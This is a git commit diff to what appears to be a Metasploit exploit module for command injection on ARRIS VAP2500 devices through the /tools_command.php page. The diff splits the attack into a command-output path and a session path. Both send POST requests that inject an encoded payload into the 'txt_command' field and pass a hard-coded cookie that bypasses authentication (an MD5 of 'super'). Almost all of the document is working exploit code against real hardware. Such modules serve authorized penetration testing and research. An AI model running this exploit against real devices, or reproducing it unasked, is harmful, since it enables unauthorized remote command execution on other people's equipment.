Split exploit cmd vs exploit session

jvazquez-r7 · jvazquez-r7 · commit f37ac39b4c0c · 2015-01-21T20:46:37.000-06:00
diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb
@@ -39,7 +39,12 @@ def initialize(info = {})
       'Payload'        =>
         {
           'DisableNops' => true,
-          'Space'       => 1024
+          'Space'       => 1024,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              #'RequiredCmd' => 'generic perl ruby python bash telnet'
+            }
         },
       'Platform'       => 'unix',
       'Arch'           => ARCH_CMD,
@@ -74,13 +79,20 @@ def exploit
 
     print_status("#{peer} - Exploiting...")
 
-    uri = '/tools_command.php'
+    if datastore['CMD']
+      exploit_cmd
+    else
+      exploit_session
+    end
+  end
+
+  def exploit_cmd
     beg_boundary = rand_text_alpha(8)
     end_boundary = rand_text_alpha(8)
 
     begin
       res = send_request_cgi({
-        'uri'    => uri,
+        'uri'    => normalize_uri('/', 'tools_command.php'),
         'vars_post' => {
           'cmb_header'  => '',
           'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
@@ -101,4 +113,20 @@ def exploit
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end
   end
+
+  def exploit_session
+    begin
+      send_request_cgi({
+        'uri'    => normalize_uri('/', 'tools_command.php'),
+        'vars_post' => {
+         'cmb_header'  => '',
+         'txt_command' => "#{payload.encoded}"
+        },
+        'method' => 'POST',
+        'cookie' => "p=#{Rex::Text.md5('super')}"
+      }, 3)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
 end
